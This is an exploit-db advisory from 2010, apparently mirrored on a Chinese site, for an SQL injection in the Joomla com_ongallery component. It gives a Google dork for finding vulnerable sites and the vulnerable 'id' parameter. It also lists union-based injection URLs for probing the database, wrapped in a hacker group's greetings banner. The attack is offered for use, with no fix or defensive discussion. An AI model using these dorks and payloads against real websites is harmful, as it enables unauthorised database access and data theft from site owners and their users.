Joomla! Component com_ongallery – SQL Injection - 体验盒子

作者： al bayraqim

日期： 2010-08-16

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14659/

 
=================================================== 
Joomla Component (com_ongallery) SQL Injection Vulnerability 
=================================================== 

Author : _aL_Bayraqim_

Homepage : http://www.1923turk.com
 
BORDO BERELİLER GRUP KOMUTANLIGI

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mü cahit...!

=================================================== 
[+]G00gle Dork :index.php?option=com_ongallery

[+] Vulnerable File :


http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL] 


[+] ExploiT : 

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
 
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- 


=================================================== 
ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?..
=================================================== 

Greetz : 1923Turk All Users